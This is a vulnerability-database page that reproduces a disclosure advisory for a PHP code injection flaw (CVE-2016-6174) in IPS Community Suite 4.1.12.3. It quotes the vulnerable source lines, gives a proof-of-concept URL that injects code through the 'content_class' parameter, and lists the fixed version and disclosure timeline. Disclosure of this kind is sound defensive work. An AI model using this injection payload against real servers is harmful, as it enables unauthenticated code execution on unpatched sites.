Vulners
Lucene search
IPS Community Suite 4.1.12.3 - PHP Code Injection
| Reporter | Title | Published | Views | Family All 18 |
|---|---|---|---|---|
 | IPS Community Suite 4.1.12.3 - PHP Code Injection | 11 Jul 201600:00 | – | zdt |
 | Mac OS X 10.x < 10.12 Multiple Vulnerabilities | 21 Oct 201600:00 | – | nessus |
| macOS < 10.12 Multiple Vulnerabilities | 23 Sep 201600:00 | – | nessus |
 | About the security content of macOS Sierra 10.12 | 20 Sep 201600:00 | – | apple |
| About the security content of macOS Sierra 10.12 - Apple Support | 23 Jan 201705:36 | – | apple |
 | IPS Community Suite PHP Code Injection Vulnerability | 12 Jul 201600:00 | – | cnvd |
 | IPS Community Suite Remote Code Execution (CVE-2016-6174) | 5 Jul 202000:00 | – | checkpoint_advisories |
 | CVE-2016-6174 | 12 Jul 201619:00 | – | cve |
 | CVE-2016-6174 | 12 Jul 201619:00 | – | cvelist |
 | IPS Community Suite RCE | 15 Jul 201600:00 | – | dsquare |
10
---------------------------------------------------------------------------
IPS Community Suite <= 4.1.12.3 Autoloaded PHP Code Injection Vulnerability
---------------------------------------------------------------------------
[-] Software Link:
https://invisionpower.com/
[-] Affected Versions:
Version 4.1.12.3 and prior versions.
[-] Vulnerability Description:
The vulnerable code is located in the /applications/core/modules/front/system/content.php script:
38. $class = 'IPS\\' . implode( '\\', explode( '_', \IPS\Request::i()->content_class ) );
39.
40. if ( ! class_exists( $class ) or ! in_array( 'IPS\Content', class_parents( $class ) ) )
41. {
42. \IPS\Output::i()->error( 'node_error', '2S226/2', 404, '' );
43. }
User input passed through the "content_class" request parameter is not properly sanitized before being used in a call
to the "class_exists()" function at line 40. This could be exploited by unauthenticated attackers to inject and execute
arbitrary PHP code leveraging the autoloading function defined into the /applications/cms/Application.php script:
171. if ( mb_substr( $class, 0, 14 ) === 'IPS\cms\Fields' and is_numeric( mb_substr( $class, 14, 1 ) ) )
172. {
173. $databaseId = mb_substr( $class, 14 );
174. eval( "namespace IPS\\cms; class Fields{$databaseId} extends Fields { public static \$customDatabaseId [...]
175. }
Successful exploitation of this vulnerability requires the application running on PHP before version 5.4.24 or 5.5.8.
[-] Proof of Concept:
http://[host]/[ips]/index.php?app=core&module=system&controller=content&do=find&content_class=cms\Fields1{}phpinfo();/*
[-] Solution:
Update to version 4.1.13 or later.
[-] Disclosure Timeline:
[04/07/2016] - Vendor notified
[05/07/2016] - Vulnerability fixed in version 4.1.13: https://invisionpower.com/release-notes/4113-r44/
[06/07/2016] - CVE number requested
[06/07/2016] - CVE number assigned
[07/07/2016] - Public disclosure
[-] CVE Reference:
The Common Vulnerabilities and Exposures project (cve.mitre.org)
has assigned the name CVE-2016-6174 to this vulnerability.
[-] Credits:
Vulnerability discovered by Egidio Romano.
[-] Original Advisory:
http://karmainsecurity.com/KIS-2016-11Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
11 Jul 2016 00:00Current
8.1High risk
Vulners AI Score8.1
CVSS 26.8
CVSS 38.1
EPSS0.19825